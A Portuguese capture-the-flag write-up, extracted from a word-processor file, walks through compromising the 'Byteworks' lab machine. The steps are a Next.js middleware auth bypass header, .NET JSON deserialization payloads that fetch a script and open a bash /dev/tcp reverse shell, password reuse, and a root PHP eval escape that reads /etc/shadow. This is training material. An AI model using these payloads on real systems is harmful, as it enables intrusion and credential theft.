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dbqhu2ogylru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w2b0x53h0hhw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Byteworks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fp46q44qqxk5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Iniciamos a enumeração da máquina com o objetivo de identificar os serviços ativos em execução no sistema.</w:t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nmap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--open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-vvv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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Identificamos duas portas abertas na máquina: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80/tcp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22/tcp (SSH).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acessar a porta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visualizar a aplicação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web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execução.</w:t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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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a página, identificamos na seção de contato um endereço de e-mail que revelou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vhost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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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byteworks.hc</w:t>
        </w:r>
      </w:hyperlink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Adicionamos o vhost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byteworks.hc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permitir a resolução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local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 domínio.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byteworks.hc"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13188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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1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domínio identificado, realizamos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enumerar possíveis subdomínios. Foi identificado o subdomínio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chat,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foi adicionado ao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permitir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resolução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local do endereço.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"http://byteworks.hc/"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"Host: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FUZZ.byteworks.hc"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shubs-subdomains.txt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63900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Acessamos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subdomínio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recém-descoberto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durante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analisar a aplicação exposta.</w:t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517900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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subdomínio recém-descoberto, realizamos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enumerar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arquivos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diretórios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da aplicação web. Foram identificadas as rotas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/login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/dashboard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sendo que a rota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/dashboard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exigia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autenticação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acesso.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ffuf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http://chat.byteworks.hc/FUZZ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common.txt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24200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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a aplicação com a extensão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Wappalyzer,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identificamos que o site utilizava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Next.js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versão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15.0.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46300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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essa versão específica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Next.js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existe a </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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CVE-2025-29927,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um bypass de autorização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middleware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permitia acessar rotas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autenticadas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apenas adicionando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header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específico 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requisição.</w:t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acessar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/dashboard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apenas adicionando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header X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware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na requisição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X-Middleware-Subrequest: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middleware:middleware:middleware:middleware:middleware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Interceptamos a requisição utilizando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proxy,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realizamos uma requisição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GET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/dashboard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adicionamos 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headers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necessários para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bypass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autenticação.</w:t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701800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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foi possível acessar as funcionalidades da aplicação mesmo sem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autenticação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66900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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o acesso às rotas dependia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header específico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configuramos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Burp Suite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adicioná-lo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automaticamente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em todas as requisições interceptadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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57400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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analisar a aplicação, identificamos um chat interno que mencionava um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Gitea,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incluindo as credenciais de login da aplicação.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0xmIpxnKA1e5HXz1CBoY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632200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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se tratava de um serviço interno, adicionamos o subdomínio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gitea.byteworks.hc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permitir a resolução local.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Acessamos o subdomínio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gitea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analisar o serviço exposto.</w:t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06074"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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74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as credenciais já haviam sido descobertas anteriormente, foi possível autenticar no serviço sem restrições.</w:t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94188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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1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Após autenticar na aplicação, identificamos o repositório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BookStore,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continha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código-fonte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domínio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onde a aplicação estava sendo executada: </w:t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http://ecomm-bookstore-staging04.byteworks.hc.</w:t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48100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Adicionamos esse subdomínio ao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permitir a resolução local do endereço. Ao acessar esse subdomínio, foi possível visualizar a aplicação em execução.</w:t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11500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Baixamos todo o código-fonte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Gitea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análise local.</w:t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Entre os arquivos analisados, foi identificada a pasta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Controller,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continha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CartController.cs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Nessa implementação, a aplicação utilizava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Newtonsoft.Json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TypeNameHandling.All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deserializar dados controlados pelo usuário na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/Cart/RestoreCart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Essa configuração permitia ao atacante definir tipos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arbitrários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do campo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$type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payload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resultando na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instanciação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classes perigosas durante o processo de deserialização, conforme evidenciado pela configuração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JsonSerializerSettings.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JsonSerializerSettings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TypeNameHandling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TypeNameHandling.All,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SerializationBinder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restoredData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JsonConvert.DeserializeObject(cartData,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settings);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11500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Através da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deserialização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insegura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permite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instanciação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System.Diagnostics.ProcessStartInfo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O objeto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deserializado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é posteriormente utilizado para iniciar um processo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Process.Start(),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possibilitando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execução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arbitrária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comandos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sistema operacional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servidor com os privilégios da aplicação web.</w:t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executar comandos no sistema operacional, utilizando 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curl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apenas para validar se a requisição era realizada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"curl\",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\"Arguments\":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\"http://&lt;vpn-ip&gt;:80\",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\"UseShellExecute\":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55800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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requisição foi realizada com sucesso, sendo possível observar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request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chegando ao nosso servidor.</w:t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38200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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foi possível executar uma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baixada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 máquina alvo utilizando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wget,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hospedada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index.html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e, em seguida, executada no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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#!/bin/bash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/bin/bash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/dev/tcp/&lt;machine-ip&gt;/443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0&gt;&amp;1'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95400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"curl\",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\"Arguments\":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\"http://&lt;machine-ip&gt;:80/\",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\"UseShellExecute\":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7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Executamos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index.html,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continha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responsável por estabelecer a conexão com o atacante.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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"bash\",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\"Arguments\":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\"index.html\",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\"UseShellExecute\":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false}”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59000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Recebemos a conexão reversa com sucesso na porta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443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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w9tf236ksbf2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Obtivemos uma shell TTY interativa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D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/dev/null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ctr+z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-echo;fg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4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máquina alvo existia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devteam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Utilizamos a mesma senha obtida no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Gitea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autenticar com este usuário. A senha era válida, permitindo acesso ao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usuário devteam.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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devteam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0xmIpxnKA1e5HXz1CBoY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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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usuário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/home/devteam.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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724525" cy="895350"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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953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1l6lkscp8kd9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a senha em mãos, verificamos se o usuário possuía privilégios para executar comandos como outro usuário através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Pelo comando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executar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/usr/bin/php /opt/byteworks/byteworks_console.php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privilégios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root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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19200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Conteúdo do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byteworks_console.php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&lt;?php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"==============================\n";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Byteworks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Developer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Shell\n";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"==============================\n";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$applications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'dev'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['UserAPI'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'BillingService'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'WARNING',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'Chatbot'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'staging'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['UserAPI'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'BillingService'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'Chatbot'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'DEPLOYING'],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['UserAPI'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'BillingService'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'Chatbot'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'OK'],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(true)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"\n[byteworks@dev-console]$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$input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readline();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(trim($input)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"help")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"Available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commands:\n";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Display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Byteworks\n";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environments\n";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&lt;env&gt;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(trim($input)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"info")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"Byteworks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Software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Solutions\n";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"Website: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http://byteworks.hc\n";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"Focus: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DevSecOps,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APIs\n";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(trim($input)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"apps")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"Environments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monitored:\n";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staging\n";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(str_starts_with($input,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$parts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explode("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$input);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$env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$parts[1]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??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(!array_key_exists($env,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$applications))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"Unknown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'$env'.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dev,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staging,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prod.\n";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'$env':\n";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($applications[$env]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$status)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$app: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$status\n";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continue;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(trim($input)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"exit")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"Exiting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console...\n";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$blacklist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'system',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'shell_exec',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'exec',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'passthru',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'popen',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'proc_open',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'file_get_contents',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'file_put_contents',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'include',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'require'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($blacklist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$function)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(str_contains($input,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$function))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die("BLOCKED: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restricted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'$function'\n");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eval($input);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(Error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$e-&gt;getMessage()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arquivo executava diretamente a entrada do usuário através da função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eval,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permitindo a execução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arbitrária de código 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sistema com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privilégios de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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No código, foi possível observar a presença de funções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blacklist,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além de funções críticas desabilitadas via configuração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(php.ini)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shell_exec.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Abaixo a lista de todas as funções desabilitadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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/etc/php/8.3/cli/php.ini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disable_functions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1000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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todas as funções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execução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comandos no sistema estavam desabilitadas, mas o arquivo ainda era executado como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realizar a leitura de arquivos internos do sistema com privilégios elevados. Lemos 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/etc/shadow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do linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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$f=new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SplFileObject('/etc/shadow');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foreach($f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5753100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Também foi possível ler a flag localizada em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/root/root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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$f=new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SplFileObject('/root/root.txt');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foreach($f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46200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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headerReference r:id="rId40" w:type="default"/>
      <w:headerReference r:id="rId41" w:type="first"/>
      <w:headerReference r:id="rId42" w:type="even"/>
      <w:footerReference r:id="rId43" w:type="default"/>
      <w:footerReference r:id="rId44" w:type="first"/>
      <w:footerReference r:id="rId45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0">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1u6uz9buoav5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67" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20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1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2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41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40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Byteworks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40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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId45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27.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/273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12.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://byteworks.hc" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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jp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3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hZa8Fd513TmY9Fo1LfxD7z+L8A==">CgMxLjAyDmguZGJxaHUyb2d5bHJ1Mg5oLncyYjB4NTNoMGhodzIOaC5mcDQ2cTQ0cXF4azUyDmgudzl0ZjIzNmtzYmYyMg5oLjFsNmxrc2NwOGtkOTIOaC4xdTZ1ejlidW9hdjU4AHIhMTRBS25MV05UUVJFVmpZTlUxMUpFaGthZUx1TE9uQy16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